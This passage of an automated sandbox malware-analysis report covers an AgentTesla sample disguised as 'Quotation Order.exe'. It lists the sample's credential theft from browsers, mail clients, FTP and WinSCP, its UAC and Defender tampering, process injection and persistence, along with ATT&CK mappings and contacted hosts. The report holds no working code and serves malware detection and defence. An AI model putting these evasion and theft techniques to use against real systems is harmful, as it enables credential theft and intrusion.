                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Quotation Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Changes security center settings (notifications, updates, antivirus, firewall)
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                    Disables UAC (registry)
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                    Source: Amcache.hve.35.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.35.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.35.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: svchost.exe, 00000007.00000002.2515010756.000001E49BD02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000007.00000002.2515010756.000001E49BD02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.35.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7976, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4884, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7976, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4884, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7976, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4884, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts241
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		311
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		45
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		771
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron11
                    Registry Run Keys / Startup Folder                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets381
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items381
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432027 Sample: Quotation Order.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 73 mail.bonnyriggdentalsurgery.com.au 2->73 75 ip-api.com 2->75 77 bg.microsoft.map.fastly.net 2->77 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 17 other signatures 2->89 10 Quotation Order.exe 1 8 2->10         started        14 svchost.exe 1 4 2->14         started        16 svchost.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 file5 71 C:\Users\user\AppData\Roaming\svchost.exe, PE32+ 10->71 dropped 127 Creates multiple autostart registry keys 10->127 129 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->129 20 cmd.exe 1 10->20         started        22 cmd.exe 1 10->22         started        25 conhost.exe 10->25         started        131 Multi AV Scanner detection for dropped file 14->131 133 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->133 135 Writes to foreign memory regions 14->135 137 Disables UAC (registry) 14->137 27 AddInProcess32.exe 14->27         started        33 5 other processes 14->33 139 Adds a directory exclusion to Windows Defender 16->139 141 Injects a PE file into a foreign processes 16->141 29 CasPol.exe 16->29         started        35 3 other processes 16->35 143 Query firmware table information (likely to detect VMs) 18->143 145 Changes security center settings (notifications, updates, antivirus, firewall) 18->145 31 AddInProcess32.exe 18->31         started        37 8 other processes 18->37 signatures6 process7 signatures8 39 svchost.exe 4 20->39         started        42 conhost.exe 20->42         started        44 timeout.exe 1 20->44         started        91 Uses schtasks.exe or at.exe to add and modify task schedules 22->91 46 conhost.exe 22->46         started        48 schtasks.exe 1 22->48         started        93 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->93 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->95 97 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 27->97 99 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 27->99 101 Tries to steal Mail credentials (via file / registry access) 29->101 103 Tries to harvest and steal ftp login credentials 29->103 105 Tries to harvest and steal browser information (history, passwords, etc) 29->105 107 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->107 50 conhost.exe 33->50         started        52 conhost.exe 35->52         started        109 Loading BitLocker PowerShell Module 37->109 54 conhost.exe 37->54         started        process9 signatures10 111 Writes to foreign memory regions 39->111 113 Adds a directory exclusion to Windows Defender 39->113 115 Injects a PE file into a foreign processes 39->115 56 CasPol.exe 39->56         started        61 powershell.exe 39->61         started        63 conhost.exe 39->63         started        65 5 other processes 39->65 process11 dnsIp12 79 mail.bonnyriggdentalsurgery.com.au 192.254.225.166, 49703, 49708, 49717 UNIFIEDLAYER-AS-1US United States 56->79 81 ip-api.com 208.95.112.1, 49701, 49705, 49715 TUT-ASUS United States 56->81 69 C:\Users\user\AppData\Roaming\...\avdfUcC.exe, PE32 56->69 dropped 117 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 56->117 119 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 56->119 121 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 56->121 125 3 other signatures 56->125 123 Loading BitLocker PowerShell Module 61->123 67 conhost.exe 61->67         started        file13 signatures14 process15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Quotation Order.exe32%ReversingLabsWin64.Trojan.AgentTesla
                    Quotation Order.exe29%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\svchost.exe32%ReversingLabsWin64.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://Passport.NET/tbpose0%URL Reputationsafe
                    http://passport.net/tb0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    http://Passport.NET/STS0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://Passport.NET/tb_0%Avira URL Cloudsafe
                    http://r3.i.lencr.org/0T0%Avira URL Cloudsafe
                    http://mail.bonnyriggdentalsurgery.com.au0%Avira URL Cloudsafe
                    http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%Avira URL Cloudsafe
                    http://www.microsoft.co40%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.210.172
                    		truefalse
                      		unknown
                      mail.bonnyriggdentalsurgery.com.au
                      		192.254.225.166
                      		truetrue
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://account.live.com/msangcwamvicesvchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://docs.oasis-open.org/wss/2004/01svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425819438.000002B804E72000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdonMesvchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://standards.iso.org/iso/19770/-2/2009/schema.xsdsvchost.exe, 00000008.00000002.2513040274.0000029957118000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2511975756.0000029956887000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.8.drfalse
                                        		high
